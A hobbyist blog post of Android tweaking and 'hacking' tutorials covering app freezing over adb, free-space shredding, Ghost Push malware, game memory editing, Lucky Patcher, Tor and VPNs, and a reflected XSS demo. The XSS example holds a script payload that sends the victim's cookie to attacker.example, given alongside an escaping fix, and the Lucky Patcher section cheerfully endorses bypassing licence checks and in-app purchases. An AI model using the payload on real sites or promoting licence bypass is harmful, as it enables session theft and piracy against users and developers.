Friday, March 2, 2018

Tweaking Android - Boost

“When you modify a certain piece of hardware for better performance, it is often referred to as "tweaking" it. Overclocking the computer's CPU or changing jumper settings on the motherboard are common examples of hardware tweaking. Removing system limitations and adding plug-ins or extensions to a computer's operating system are types of software tweaking.”

Before learning hacking, let's make sure that your device is responsive and free from lag. To do this, you need to tweak it. This tutorial is for non-rooted devices. First things first, let's ask: what causes Android to lag? "Your Android phone was probably fast when you first bought it, right? Then over time it began running more slowly. This is a common problem and nothing to worry about." -Scott Adam Gordon (www.androidpit.com). The usual causes are a misbehaving app, too many applications running in the background, and/or the system itself.

HOW TO FIX

Method 1: Uninstalling, Stopping, and/or Freezing Applications 

  •  You need to sacrifice some apps to gain speed. If you have the Facebook app or Facebook Messenger installed, say goodbye to them (unless you're not ready to move on...): both keep background services running at all times. 
  •  If you don't want to uninstall applications, you can stop them running in the background. Go to Settings > Apps, choose the app, then tap "Force stop". Keep in mind that a force stop only lasts until the app is launched again or its next scheduled wake-up. 
  •  Disabling (freezing) is useful for system apps you rarely use. Go to Settings > Apps > System apps, select the app, then tap Disable. NOTE: the Settings app only offers Disable for apps the manufacturer marked safe to disable; forcing other system components off through root or adb can leave the device unable to boot. Done through Settings, these steps are safe and reversible (Enable undoes Disable).  
Method 2: Disabling animations

Turning off the window, transition and animator animations makes the interface feel faster. The switches live under Developer options, which is hidden by default. On Android 4.2 and higher, enable it as follows:

  •  Open the Settings app.
  •  (Only on Android 8.0 or higher) Select System.
  •  Scroll to the bottom and select About phone.
  •  Scroll to the bottom and tap Build number 7 times.
  •  Return to the previous screen to find Developer options near the bottom.
Then open Developer options, scroll to the Drawing section and set Window animation scale, Transition animation scale and Animator duration scale to "Animation off" (or 0.5x if you still want some visual feedback).
Note: On versions below 4.2, Developer options is already visible in Settings, so the Build number step is not needed.
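The same tweaks can be applied from a computer over adb, without installing a booster app. The following is an added example, not the post's own material: it builds the force-stop, disable and animation-scale commands as argv lists so they can be reviewed before anything runs. The package names in the sample `pm list packages -3` output are constructed, and `plan_tweaks`/`run_plan` are names chosen here.

```python
"""Plan the force-stop / disable / animation tweaks as adb commands.

Added example (not from the original post). Package names in the sample
`pm list packages -3` output below are constructed.
"""
import shlex
import subprocess
from typing import List

# Global settings behind Developer options -> Drawing -> *animation scale.
ANIMATION_KEYS = (
    "window_animation_scale",
    "transition_animation_scale",
    "animator_duration_scale",
)

# Constructed sample of `adb shell pm list packages -3` (third-party apps only).
SAMPLE_PM_OUTPUT = """package:com.facebook.katana
package:com.facebook.orca
package:org.example.reader
"""


def parse_package_list(pm_output: str) -> List[str]:
    """Turn `pm list packages` output (`package:<name>` per line) into names."""
    names = []
    for line in pm_output.splitlines():
        line = line.strip()
        if line.startswith("package:"):
            names.append(line[len("package:"):])
    return names


def plan_tweaks(force_stop: List[str], disable: List[str],
                animation_scale: str = "0") -> List[List[str]]:
    """Return the adb argv lists that apply the tweaks, in run order.

    - `am force-stop` kills the app's processes (Settings -> Force stop).
    - `pm disable-user --user 0` is the adb form of Settings -> Disable; it
      works for bundled apps without root and `pm enable` reverses it.
    - `settings put global <key> 0` switches the three animation scales off.
    """
    cmds: List[List[str]] = []
    for pkg in force_stop:
        cmds.append(["adb", "shell", "am", "force-stop", pkg])
    for pkg in disable:
        cmds.append(["adb", "shell", "pm", "disable-user", "--user", "0", pkg])
    for key in ANIMATION_KEYS:
        cmds.append(["adb", "shell", "settings", "put", "global", key, animation_scale])
    return cmds


def run_plan(cmds: List[List[str]], execute: bool = False) -> List[str]:
    """Print each command; run it only when execute=True and a device is attached."""
    rendered = []
    for argv in cmds:
        text = " ".join(shlex.quote(a) for a in argv)
        rendered.append(text)
        print(text)
        if execute:
            subprocess.run(argv, check=True)
    return rendered


if __name__ == "__main__":
    third_party = parse_package_list(SAMPLE_PM_OUTPUT)
    facebook = [p for p in third_party if p.startswith("com.facebook.")]
    # Dry run: review the commands, then rerun with execute=True.
    run_plan(plan_tweaks(force_stop=facebook, disable=[]), execute=False)
```

Unlike the Settings app, adb will let you disable packages the manufacturer did not mark as safe, so only pass package names you have looked up; `adb shell pm enable <pkg>` undoes a disable. Enabling USB debugging is required, and you should turn it back off afterwards, since an attached computer with debugging access can read a lot more than animation settings.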

Method 3: Install an app to boost device performance. 
  •  Clean Master LITE – stops app processes and cleans useless files; claims to be the best booster on the Play Store. See for yourself. (https://play.google.com/store/apps/details?id=com.cmcm.lite) Caveat: Google removed Cheetah Mobile's apps, Clean Master included, from the Play Store in 2020 for ad fraud, so prefer the built-in steps in Methods 1 and 2 over a third-party booster. 
  •  Greenify – works on rooted and non-rooted devices. Hibernates (force stops) all selected apps in one tap. I suggest paying for the pro version, which also hibernates system apps. (https://play.google.com/store/apps/details?id=com.oasisfeng.greenify)
There you go! Your device should be faster now. If you still don't feel any difference, don't worry, this is not hacking yet. Later, we're going to hack your device's system.


Recover or Shred deleted files

Deleted files can still be recovered. As hackers, we may have saved important or confidential files on an Android device, and anyone who gets hold of the device can recover them, which is fatal for us. Therefore, we may need to shred this data.

How to recover deleted files? 

First, we must know how to recover deleted files. There are a number of file recovery apps, but I use "GT File Recovery." It is so user-friendly that I don't even need to explain how to use it! It only requires root access, and that's it!  

How to shred deleted files? 

Shredding a file means deleting it for good. For this tutorial we will use Fshred. Install the app from the Play Store and open it; you will be asked which storage volume you want to wipe. Fshred creates one huge file that fills the selected volume's free space and then deletes it; once every free block has been overwritten, previously deleted files can no longer be recovered. NOTE: Fshred does not harm existing files. Make sure the battery is fully charged before you start, because filling a large volume takes a long time. Two caveats worth knowing: flash storage with wear levelling can keep stale copies of blocks that a free-space fill never reaches, and on devices using file-based encryption (introduced in Android 7 and required for new devices since Android 10) deleted file contents are already unreadable without the per-file key, so shredding matters mostly for older unencrypted devices and for portable SD cards.
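What Fshred does can be reproduced in a few lines. The following is an added example, not Fshred's code: it writes a zero-filled file until the volume reports ENOSPC, flushes it to the medium and deletes it, so the blocks that deleted files used to occupy are overwritten. The `max_bytes` cap and the `demo` helper are assumptions added so the routine can be tried without filling a real volume.

```python
"""Overwrite a volume's free space, the way Fshred does.

Added example (not Fshred's code).  Caveats from the text apply: wear
levelling on flash can keep stale copies this never reaches, and on
file-based encryption the old contents are already unreadable without the
per-file key.  `max_bytes` is an added cap for trying it out.
"""
import errno
import os
import tempfile
from typing import List, Optional, Tuple

CHUNK = 1024 * 1024  # write 1 MiB at a time


def wipe_free_space(directory: str, max_bytes: Optional[int] = None,
                    chunk: int = CHUNK) -> int:
    """Fill free space on the volume holding `directory`; return bytes written.

    Stops at ENOSPC (volume full) or once `max_bytes` have been written.
    The filler file is removed even if a write fails part-way.
    """
    path = os.path.join(directory, ".wipe.tmp")
    zeros = b"\0" * chunk
    written = 0
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    try:
        while max_bytes is None or written < max_bytes:
            want = chunk if max_bytes is None else min(chunk, max_bytes - written)
            try:
                written += os.write(fd, zeros[:want])
            except OSError as exc:
                if exc.errno == errno.ENOSPC:
                    break  # every free block on the volume is now overwritten
                raise
        os.fsync(fd)  # push the data out of the page cache onto the medium
    finally:
        os.close(fd)
        os.unlink(path)  # free the space again; the overwrite has already happened
    return written


def demo(max_bytes: int) -> Tuple[int, List[str]]:
    """Run a capped wipe in a scratch directory; return (bytes written, leftover files)."""
    with tempfile.TemporaryDirectory() as scratch:
        written = wipe_free_space(scratch, max_bytes=max_bytes)
        return written, os.listdir(scratch)


if __name__ == "__main__":
    # A real run would be wipe_free_space("/sdcard") with no cap.
    print(demo(3 * CHUNK))  # (3145728, [])
```

Run it against `/sdcard` (or the SD card mount point) from a terminal app or `adb shell`; with no cap it keeps going until the volume is full, which is why the battery warning above matters.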

Alternative Recovery apps

Source: Google Play Store
1. Disk Digger (Photo Recovery)
2. Photo Recovery
3. Deleted Photo Recovery
4. Dumpster (Photo & Video Recovery)
5. Memory card Recovery
6. GT Recovery
7. The Recovery app
8. Undeleter (This one is the most effective but the recovery features are paid)
9. GT Sms Recovery (Recover Text messages)

Fixing bootloop (soft brick) 


What is bootloop?

It is when your Android device is stuck on the boot screen, a.k.a. the stuck-at-logo problem. It usually happens after you tamper with the device's system files. In some cases unrooted devices boot loop because of a factory defect, but normally it happens only on rooted devices. Some people call this a soft brick, because the device is not totally bricked; it is half dead, though...

What is the cause of Bootloop?

 “Boot Loop Causes. The core problem found in a boot loop is a miscommunication that prevents the Android operating system from completing its launch. These can be caused by corrupt app files, faulty installs, viruses, malware and broken system files.”

How to fix? 


Warning: This tutorial may not be compatible with all Android devices. 
For this tutorial, we are going to use SP Flash Tool. SP Flash Tool is a PC application for flashing firmware to MediaTek (MTK) based Android devices (e.g. Tecno, Gionee, Infinix, Opsson, Innjoo) and is useful in extreme cases of a bricked device, such as the phone not turning on at all or not booting into recovery mode.

Requirements

Your Android smartphone should have at least 40-50 percent battery to perform the flashing process.
Android Malwares – Ghost push

Malware is software you did not choose to install and would not want installed. It is a threat to your security and to the data on your device.

Ghost Push is a family of malware that infects the Android OS by automatically gaining root access, downloading malicious software, masquerading as a system app, and then losing root access, which then makes it virtually impossible to remove the infection even by factory reset unless the firmware is reflashed. The malware hogs all the system resources, making the phone unresponsive and draining the battery. Advertisements continually appear either as full or partial screen ads or in the status bar. Unwanted apps and malicious software are automatically downloaded and installed when connected to the internet. The malware is hard to detect.

It was discovered on September 18, 2015 by Cheetah Mobile's CM Security Research Lab. 

Further investigation of Ghost Push revealed more recent variants, which, unlike older ones, employ the following routines that make them harder to remove and detect: 

  •  encrypt its APK and shell code,
  •  run a malicious DEX file without notification,
  •  add a “guard code” to monitor its own processes,
  •  rename .APK (Android application package) files used to install the malicious apps,
  •  And launch the new activity as the payload.
Source: https://en.wikipedia.org/wiki/Ghost_Push

I am a victim of this malware too and it took me a week before I discovered the tool to remove this malware.

How is this part of hacking? 

This malware is created by criminals to make money from your device (pushing ads and installing apps you never asked for), and it can harvest personal information along the way. Protecting yourself from it is an important thing to learn. 

Let’s get started! 

If you think you are infected, download and install "Stubborn Trojan Killer" by Cheetah Mobile from the Google Play Store. Run the app and let it decide whether you are infected and how to fix it. If Stubborn Trojan Killer asks for root permission, grant it. Caveat: as the summary above says, a factory reset does not remove Ghost Push because it installs itself alongside the system apps, so reflashing the stock firmware is the one reliable fix; also note that Cheetah Mobile's apps were removed from the Play Store in 2020 for ad fraud, so you may have to look elsewhere for a cleaner.
Unlimited Game Resources and The Lucky Patcher


Unlimited Game Resources 

Are you an Android gamer? Have you ever thought of hacking your game's resources? Do you want unlimited gold, gems, health, etc.? For this tutorial you'll need the "Game Guardian" app, which works by searching and editing the game process's memory and therefore needs root (or a virtual-space app that hosts the game). Game Guardian is not available on Google Play, which means you have to download its APK yourself and install it.

Where to download GameGuardian

1. Open your fastest browser (connect to Wi-Fi for a faster download).
2. Go to https://gameguardian.net/download
3. Download the Game Guardian APK and install it. Only take it from the official site: sideloaded APKs from random mirrors are exactly how malware like Ghost Push gets onto devices.

How to use Game Guardian? 

NOTE: Game Guardian only works on offline games. An online game keeps the real values on its server, so editing the copy in your device's memory changes nothing, or gets the account banned. The best way to learn this hack is to watch it being done. YouTube link: https://www.youtube.com/watch?v=lbk9FDdIsAU 
Some Android games are hard to hack (the values are obfuscated or encrypted in memory). In that case you might consider a modified version of the game from https://www.apklover.net, but be aware that modified APKs from third-party sites are a common way to get malware, so treat them as untrusted.
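Game Guardian's workflow is: search memory for the value the game shows, change that value in the game, search again among the previous hits, repeat until one address is left, then write the value you want. The following is an added example, not GameGuardian's code, that carries out that loop over a constructed bytearray standing in for the game process's memory; the offsets and the `spend_gold` simulation are made up for the example. On a real device the same scan would read and write `/proc/<pid>/mem`, which is why root is needed.

```python
"""Search-and-refine memory editing, the loop behind Game Guardian.

Added example (not GameGuardian's code).  A constructed bytearray stands in
for the game process's memory; on a real device the same loop would read
and write /proc/<pid>/mem, which needs root.
"""
import struct
from typing import Iterable, List, Sequence, Tuple

INT32 = struct.Struct("<i")  # ARM Android is little-endian
GOLD_OFFSET = 8              # only the simulated game knows this


def build_fake_game(gold: int) -> bytearray:
    """Lay out a few counters; several decoys hold 100 just like starting gold."""
    mem = bytearray(64)
    INT32.pack_into(mem, 0, 100)            # max health (decoy)
    INT32.pack_into(mem, GOLD_OFFSET, gold)  # the gold counter we are after
    INT32.pack_into(mem, 20, 100)           # next-level threshold (decoy)
    INT32.pack_into(mem, 40, 100)           # hit-damage constant (decoy)
    INT32.pack_into(mem, 60, 7)             # something unrelated
    return mem


def spend_gold(mem: bytearray, amount: int) -> None:
    """What the game itself does when you buy something."""
    INT32.pack_into(mem, GOLD_OFFSET, current_gold(mem) - amount)


def current_gold(mem: bytearray) -> int:
    """The number the game draws on screen."""
    return INT32.unpack_from(mem, GOLD_OFFSET)[0]


def scan(memory: bytes, value: int, step: int = 4) -> List[int]:
    """Every aligned offset whose 32-bit little-endian int equals `value`."""
    needle = INT32.pack(value)
    return [off for off in range(0, len(memory) - 3, step)
            if memory[off:off + 4] == needle]


def refine(memory: bytes, candidates: Iterable[int], value: int) -> List[int]:
    """Keep only candidates that now hold `value` (the 'search again' step)."""
    needle = INT32.pack(value)
    return [off for off in candidates if memory[off:off + 4] == needle]


def find_offset(snapshots: Sequence[Tuple[bytes, int]]) -> List[int]:
    """Narrow candidates over (memory snapshot, value shown in game) pairs."""
    mem0, v0 = snapshots[0]
    cands = scan(mem0, v0)
    for mem, v in snapshots[1:]:
        cands = refine(mem, cands, v)
    return cands


def poke(mem: bytearray, offset: int, value: int) -> None:
    """Write the value we want; in Game Guardian this is the edit button."""
    INT32.pack_into(mem, offset, value)


if __name__ == "__main__":
    game = build_fake_game(100)
    first = (bytes(game), current_gold(game))   # search 1: 100 -> four hits
    spend_gold(game, 5)                         # play: buy something
    second = (bytes(game), current_gold(game))  # search 2: 95 -> one hit
    hits = find_offset([first, second])
    print("candidates:", hits)                  # [8]
    poke(game, hits[0], 9999)
    print("gold now:", current_gold(game))      # 9999
```

The decoys are the point: a single search for 100 is never enough, and each change-and-refine round discards addresses that merely happened to hold the same number. Games that defeat this store the value encoded (XORed, scaled, or split across fields) so the number on screen never appears literally in memory, which is what makes them "hard to hack".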

The Lucky Patcher 


Almost every root user knows the power of Lucky Patcher. Lucky Patcher is an app developed by ChelpuS. It lets the user block ads, uninstall system applications, install an app as a system app, modify applications and, best of all, get in-app purchases for free. Lucky Patcher was removed from the Play Store because, of course, it is a threat to Google's business.

WARNING: Using Lucky Patcher to bypass licence checks or in-app purchases is piracy and breaks Google Play's terms. That's why I like it!
Download and Install Lucky Patcher at https://lucky-patcher.en.uptodown.com/android
Then, you’re on your own.

  • The first and foremost feature of Lucky Patcher is removing advertisements from Android apps.
  • It also lets you modify app permissions.
  • It can remove the licence verification from a chosen app, so a copy obtained outside the Google Play Store no longer fails with "license verification failed".
  • It can remove pre-installed apps from your device.
  • It runs on rooted and unrooted devices, but most of its features need root. Once installed it lists every app on the device.
  • It is easy to use: a single screen lets you manage all the apps on your device.
The Deep Web – TOR Network

“Tor is free software for enabling anonymous communication. The name is derived from an acronym for the original software project name "The Onion Router". Tor directs Internet traffic through a free, worldwide, volunteer overlay network consisting of more than seven thousand relays to conceal a user's location and usage from anyone conducting network surveillance or traffic analysis. Using Tor makes it more difficult to trace Internet activity to the user: this includes "visits to Web sites, online posts, instant messages, and other communication forms". The intent for Tor's use is to protect the personal privacy of its users, as well as their freedom and ability to conduct confidential communication by keeping their Internet activities from being monitored.”

Why Should I use TOR? 

Okay, there are some tutorials that I'm not including here because they are too seriously illegal in nature. If you connect to the Tor network and browse the Deep Web, you'll learn more not just about Android hacking but about hacking itself.

Wait, what is Deep web anyway? 

Strictly, the deep web is the part of the World Wide Web that is not indexed by traditional search engines; most of it (private databases, paywalled pages, login-only content) is reachable with a normal browser. What people usually mean by "Deep Web" in this context are Tor onion services (.onion addresses), which exist only inside the Tor network and cannot be reached over a regular Internet connection.

How to connect to TOR and access Deep Web?

1. Install "Orbot" and "Orfox" from the Play Store. (Orfox has since been replaced by Tor Browser for Android, which bundles Orbot.)
2. Open Orbot, then tap Connect.
3. You can now browse .onion sites in the Orfox browser.

Note: Orbot can also route other apps through Tor, either in its VPN mode (no root needed) or by transparent proxying, which requires root access.
Virtual Private Network (VPN)

FAIR WARNING: Virtual Private Networks (VPNs) may be illegal in your country. Some countries, such as Turkey, China and Iran, block Facebook, Twitter and YouTube; if you are in one of them you may not be able to reach your favourite sites, and a VPN is one way to unblock them. For this tutorial I recommend Easy VPN.

NOTE: Some VPN apps are used to get free Internet access, but that is not what this tutorial is about. 

Easy VPN installed!

Open Easy VPN and choose the country of your choice, or press Connect right away. The VPN replaces your public IP address with one from the chosen country, so sites see that location instead of yours (it does not change the GPS location apps read). You can now enjoy your favourite apps and sites. Keep in mind that a free VPN provider sees all of your traffic that is not separately encrypted, so only use one you trust.

What is VPN and how does it work?
 Here’s the complete explanation: 
Source: https://gizmodo.com/5990192/vpns-what-they-do-how-they-work-and-whyyoure-dumb-for-not-using-one

For as ubiquitous as connectivity has become and how reliant we've grown on it, the Internet is still a digital jungle where hackers easily steal sensitive information from the ill-equipped and where the iron-fisted tactics of totalitarian regimes bent on controlling what their subjects can access are common. So instead of mucking around in public networks, just avoid them. Use a VPN instead. Between Wi-Fi spoofing, honeypot attacks, and Firesheep, public networks really are cesspools. But if you're working remotely and need to access sensitive data on your company's private servers, doing so from an unsecured public network like a coffee shop Wi-Fi hotspot could put that data, your company's business, and your job at stake.

VPNs, or Virtual Private Networks, allow users to securely access a private network and share data remotely through public networks. Much like a firewall protects your data on your computer, VPNs protect it online. And while a VPN is technically a WAN (Wide Area Network), the front end retains the same functionality, security, and appearance as it would on the private network. 

For this reason, VPNs are hugely popular with corporations as a means of securing sensitive data when connecting remote data centers. These networks are also becoming increasingly common among individual users—and not just torrenters. Because VPNs use a combination of dedicated connections and encryption protocols to generate virtual P2P connections, even if snoopers did manage to siphon off some of the transmitted data, they'd be unable to access it on account of the encryption. What's more, VPNs allow individuals to spoof their physical location—the user's actual IP address is replaced by the VPN provider's—allowing them to bypass content filters. So, you may live in Tehran but appear to live in Texas, enabling you to slip past the government filters and commit the treasonous act of watching a YouTube video. The horror.

Establishing one of these secure connections—say you want to log into your private corporate network remotely—is surprisingly easy. The user first connects to the public internet through an ISP, and then initiates a VPN connection with the company VPN server using client software. And that's it! The client software on the server establishes the secure connection, grants the remote user access to the internal network and— Bing, bang, boom—you're up to your elbows in TPS reports. The horror.

Many security protocols have been developed as VPNs, each offering differing levels of security and features. Among the more common are:

  •  IP security (IPsec): IPsec is often used to secure Internet communications and can operate in two modes. Transport mode only encrypts the data packet message itself while Tunneling mode encrypts the entire data packet. This protocol can also be used in tandem with other protocols to increase their combined level of security.
  •  Layer 2 Tunneling Protocol (L2TP)/IPsec: The L2TP and IPsec protocols combine their best individual features to create a highly secure VPN client. Since L2TP isn't capable of encryption, it instead generates the tunnel while the IPsec protocol handles encryption, channel security, and data integrity checks to ensure all of the packets have arrived and that the channel has not been compromised. 
  •  Secure Sockets Layer (SSL) and Transport Layer Security (TLS): SSL and TLS are used extensively in the security of online retailers and service providers. These protocols operate using a handshake method. As IBM explains, "An HTTP-based SSL connection is always initiated by the client using a URL starting with https:// instead of with http://. At the beginning of an SSL session, an SSL handshake is performed. This handshake produces the cryptographic parameters of the session." These parameters, typically digital certificates, are the means by which the two systems exchange encryption keys, authenticate the session, and create the secure connection. 
  •  Point-to-Point Tunneling Protocol (PPTP): PPTP is a ubiquitous VPN protocol used since the mid-1990s and can be installed on a huge variety of operating systems, having been around since the days of Windows 95. But, like L2TP, PPTP doesn't do encryption; it simply tunnels and encapsulates the data packet. Instead, a secondary protocol such as GRE or TCP has to be used as well to handle the encryption. And while the level of security PPTP provides has been eclipsed by new methods, the protocol remains a strong one, albeit not the most secure.
  • Secure Shell (SSH): SSH creates both the VPN tunnel and the encryption that protects it. This allows users to transfer unsecured data by routing the traffic from remote file servers through an encrypted channel. The data itself isn't encrypted but the channel it's moving through is. SSH connections are created by the SSH client, which forwards traffic from a local port to one on the remote server. All data between the two ends of the tunnel flows through these specified ports.
  These SSH tunnels are the primary means of subverting the government content filters described earlier. For example, if the filter prohibits access to TCP port 80, which handles HTTP, all user access to the Internet is cut off. However, by using SSH, the user can forward traffic from port 80 to another port on the local machine, which will still connect to the remote server's port 80. So as long as the remote server allows outgoing connections, the bypass will work. SSH also allows protocols that would otherwise be blocked by the firewall, say those for torrenting, to get past the wall by "wrapping" themselves in the skin of a protocol that the firewall does allow.


To actually create the VPN tunnel, the local machine needs to be running a VPN client. OpenVPN is a popular—and free—multi-platform application, as is LogMeIn Hamachi. Windows users also have the option of using the native OS VPN client.

So whether you're a cubicle monkey, file pirate, or just don't want The Man getting all grabby with your personal data, virtual private networks are the best means of securing traffic short of copying it to a flash drive and driving there yourself.


Web application Cross Site Scripting (XSS)

Even though cross-site scripting is usually considered a client-side (user-targeted) attack, it gets its own part here because of its importance and the variety of exploitation scenarios. Three main categories of XSS attack can be distinguished: 

  •  Echo or reflected attack: the attack relies on a page that reflects, in full or in part, the input it receives straight back into the response. The echo was meant as a convenience but becomes a vulnerability because the input is not sanitized. 
  •  Stored script attack: this category covers attacks where the attacker is able to store content on the server side without it being sanitized, and that content is later served to other users. 
  •  DOM-based attack: the attacker relies on client-side script updating the Document Object Model of the page from attacker-controlled data (for example the URL fragment), so the payload never passes through the server's reflection at all. 

  Echo or reflection based XSS


Attack requirements:

A. The application has a page that echoes an input parameter into its output.
B. No sanitization or output encoding is applied to the reflected input.

Attack process:

A. The attacker crafts a link to the trusted site's vulnerable echo page, passing the JavaScript as the parameter.
B. The server sends back a response containing the injected script.
C. The victim's browser executes the JavaScript in the trusted site's origin: it can display any message, forward the victim to a phishing site, or simply send the session cookie to the attacker, who can then hijack the session. 

Example:
A. The attacker creates an email containing a link like the following, with the script placed after message=: 

<a href="http://theTrustedVulnerableSite.com/echoPage.php?message=">Visit page</a>

B. The echo page generates a response containing the script; the browser executes it and shows the alert. In a real attack the payload would be a script that automatically sends the session cookie to the attacker.
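A minimal version of the echo page described above, both vulnerable and fixed, as an added example that is not the post's code. The host name, the `attacker.example` collection server and the cookie-stealing payload are constructed for the example; `handle` stands in for the web server's request handling.

```python
"""Reflected XSS on an echo page: the vulnerable rendering and the fix.

Added example (not the post's code).  Host name, the attacker.example
collection server and the payload are constructed for this example.
"""
import html
from typing import Callable
from urllib.parse import parse_qs, urlencode, urlsplit

# What the attacker puts after ?message= : ships the victim's cookie to them.
PAYLOAD = ("<script>new Image().src="
           "'http://attacker.example/c?'+document.cookie</script>")


def echo_page_vulnerable(message: str) -> str:
    """The echo page as written: the parameter is pasted straight into HTML."""
    return "<html><body><p>Message: " + message + "</p></body></html>"


def echo_page_safe(message: str) -> str:
    """The fix for this context: HTML-encode before inserting into the body."""
    return ("<html><body><p>Message: "
            + html.escape(message, quote=True)
            + "</p></body></html>")


def attack_link(base: str = "http://theTrustedVulnerableSite.com/echoPage.php") -> str:
    """The link the attacker emails; the payload is URL-encoded into the query."""
    return base + "?" + urlencode({"message": PAYLOAD})


def handle(url: str, render: Callable[[str], str]) -> str:
    """Server side: pull `message` out of the request URL and render the page."""
    query = parse_qs(urlsplit(url).query)
    message = query.get("message", [""])[0]
    return render(message)


def contains_script(page: str) -> bool:
    """Tester's check: did an executable <script> tag come back in the response?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    link = attack_link()
    print(link)
    print("vulnerable:", contains_script(handle(link, echo_page_vulnerable)))  # True
    print("fixed:     ", contains_script(handle(link, echo_page_safe)))        # False
```

`html.escape` is the right encoder only because the value lands in HTML body text (it also covers attribute values when `quote=True`); a value placed inside a `<script>` block or a URL needs that context's encoder instead. Two server-side settings limit the damage even when an echo is missed: the `HttpOnly` flag on the session cookie stops `document.cookie` from reading it, and a Content-Security-Policy without `unsafe-inline` stops the injected inline script from running at all.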